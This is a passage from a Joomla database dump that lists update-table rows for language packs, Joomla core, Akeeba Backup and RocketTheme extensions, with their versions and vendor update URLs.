g_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3551,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3552,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3553,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3554,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3555,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3556,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3557,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3558,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3559,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3560,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3561,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3562,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3563,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3564,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3565,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3566,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3567,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3568,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3569,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3570,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3571,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3572,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3573,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3574,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3575,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3576,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3577,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3579,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.1.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(3580,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3581,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3582,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3583,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3584,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3585,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3586,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3587,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3588,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3589,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3590,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3591,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3592,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3593,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3594,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3595,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3596,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3597,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3598,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3599,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3600,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3601,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3602,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3603,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3604,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3605,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3606,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3607,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3608,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3609,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3610,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3611,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3612,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3613,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3614,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3615,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3616,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3617,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3618,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3619,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3620,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3621,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3622,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3623,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3624,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3625,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3626,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3627,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3628,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3629,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3630,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3631,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3632,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3633,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3634,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3635,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3636,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3637,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3638,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3639,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3640,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3641,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3642,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3643,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3644,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3645,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3646,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3647,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3648,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3649,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3650,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3651,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3652,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3653,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3654,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3655,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3656,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3657,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3658,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3659,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3660,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3661,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3662,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3663,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3664,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3665,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3666,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3667,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3668,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3669,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3670,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3671,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3672,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3673,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3674,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3675,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3676,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3677,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3678,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3679,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3680,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3681,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3682,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3683,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3684,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3685,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3686,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3687,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3688,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3689,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3690,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3691,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3692,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3693,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3694,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3695,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3696,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3697,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3698,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3699,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3700,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3701,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3702,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3703,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3704,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3705,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3706,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3707,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3708,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(3709,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3710,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3711,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3712,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3713,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3714,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3715,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3716,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3717,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3718,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3719,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3720,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3721,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3722,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3723,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3724,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3725,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3726,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3727,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3728,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3729,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3730,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3731,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3732,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3733,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3734,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3735,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3736,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3737,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3738,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3739,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3740,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3741,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3742,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3743,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3744,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3745,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3746,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3747,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3748,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3749,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3750,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3751,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3752,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3753,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3754,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3755,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3756,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3757,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3758,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3759,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3760,20,0,'RokGallery 